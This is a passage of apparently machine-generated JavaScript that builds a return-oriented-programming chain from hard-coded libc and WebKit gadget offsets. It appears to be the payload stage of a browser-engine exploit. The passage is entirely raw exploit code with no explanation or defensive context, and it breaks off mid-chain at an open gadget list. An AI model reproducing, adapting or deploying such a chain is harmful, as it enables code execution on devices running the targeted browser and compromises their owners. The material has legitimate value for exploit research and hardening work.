set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([128, 0]); // 0x80
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+160328, //L2348
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+782311 //pop rsp
]);
//L2348:
db([0, 0]); // 0x0
//L2121:
set_gadget(libc_base+764760,); //pop rsi
db([208, 0]); // 0xd0
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+144605, //pop rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+764760, //pop rsi
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
webkit_base+1438842, //pop rdx
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+763368, //pop rcx
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
webkit_base+568675, //pop r8
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
webkit_base+3236123, //pop r9
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+756281, //xor rax, rax
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+11, //nop
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+11, //nop
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+764760, //pop rsi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+763368, //pop rcx
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+144605, //pop rdi
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
webkit_base+568675, //pop r8
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
libc_base+782311, //pop rsp
libc_base+426295, //mov [rdi], rax
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([208, 0]); // 0xd0
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967080, 4294967295]); // -0xd8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([200, 0]); // 0xc8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967088, 4294967295]); // -0xd0
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([192, 0]); // 0xc0
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967096, 4294967295]); // -0xc8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([184, 0]); // 0xb8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967104, 4294967295]); // -0xc0
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([176, 0]); // 0xb0
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967112, 4294967295]); // -0xb8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([168, 0]); // 0xa8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+384176, //mov rax, rdi
libc_base+763368 //pop rcx
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
webkit_base+14664103, //and rax, rcx
libc_base+763368, //pop rcx
mmap_addr,
webkit_base+20307877, //mov [rax], rcx
libc_base+764760 //pop rsi
]);
db([4294967192, 4294967295]); // -0x68
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+384176, //mov rax, rdi
libc_base+764760 //pop rsi
]);
db([48, 0]); // 0x30
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+731401, //mov rax, r8
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([32, 0]); // 0x20
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+384176, //mov rax, rdi
libc_base+764760 //pop rsi
]);
db([24, 0]); // 0x18
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([128, 0]); // 0x80
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+161656, //L2349
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+782311 //pop rsp
]);
//L2349:
db([0, 0]); // 0x0
//__out_buffer:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+161728, //L2351
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L2351:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+161824, //L2352
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+161856, //L2355
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+763368 //pop rcx
]);
//L2352:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2354:
db([32, 0]); // 0x20
set_gadget(webkit_base+568675,); //pop r8
//L2355:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+161960, //L2358
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+161944, //L2356
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2356:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2358:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+162104, //L2361
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+162072, //L2359
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+162088, //L2360
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2359:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2360:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2361:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+162184, //L2362
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2362:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2364:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+162304, //L2367
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+162288, //L2365
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2365:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2367:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+162416, //L2368
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+162448, //L2370
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+162432, //L2369
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2368:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2369:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2370:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+162624, //L2372
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+162640, //L2373
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+162608, //L2371
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L2371:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2372:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2373:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+162752, //L2375
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+162800, //L2378
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+162768, //L2376
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L2375:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2376:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2377:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2378:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+162912, //L2379+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+162904, //L2379
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L2379:
db([0, 0]); // 0x0
set_gadgets([
ropchain+162928, //L2379+24
ropchain+165496, //L2374
libc_base+764760, //pop rsi
ropchain+162968, //L2380
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2380:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2382:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+163088, //L2385
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+163072, //L2383
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2383:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2385:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+163248, //L2389
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+163216, //L2387
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+163232, //L2388
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2386:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2387:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2388:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2389:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+163304, //L2391
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2391:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+163432, //L2393
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+163448, //L2394
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+163416, //L2392
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2392:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2393:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2394:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+163608, //L2398
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+163576, //L2396
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+163592, //L2397
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2395:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2396:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2397:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2398:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+163664, //L2400
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2400:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+163792, //L2402
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+163808, //L2403
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+163776, //L2401
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2401:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2402:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2403:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+163888, //L2404
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+163904, //L2405
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2404:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2405:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+164064, //L2409
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+164032, //L2407
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+164048, //L2408
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2406:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2407:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2408:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2409:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+164120, //L2411
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2411:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+164248, //L2413
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+164264, //L2414
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+164232, //L2412
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2412:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2413:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2414:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+164360, //L2416
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+164344, //L2415
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2415:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2416:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+164440, //L2417
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2417:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2419:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+164560, //L2422
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+164544, //L2420
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2420:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2422:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+164704, //L2425
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+164672, //L2423
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+164688, //L2424
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2423:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2424:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2425:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+164776, //L2427
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2427:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+164832, //L2428
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2428:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+164912, //L2430
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2430:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2432:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+165032, //L2435
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+165016, //L2433
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2433:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2435:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+165144, //L2436
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+165176, //L2438
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+165160, //L2437
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2436:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2437:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2438:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+165264, //L2440
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2440:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+165320, //L2441
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2441:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+165392, //L2444
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2444:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+165448, //L2445
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2445:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+1121481, //mov [rax], cl
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
//L2374:
libc_base+764760, //pop rsi
ropchain+165576, //L2448
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+165560, //L2447
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2447:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2448:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+165680, //L2449
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+165696, //L2450
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L2449:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2450:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+165816, //L2451
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+165800, //L2452
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L2452:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L2451:
db([0, 0]); // 0x0
//__out_null:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+165888, //L2454
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L2454:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+165984, //L2455
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+166016, //L2458
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+763368 //pop rcx
]);
//L2455:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2457:
db([16, 0]); // 0x10
set_gadget(webkit_base+568675,); //pop r8
//L2458:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+166120, //L2461
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+166104, //L2459
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2459:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2461:
db([0, 0]); // 0x0
set_gadgets([
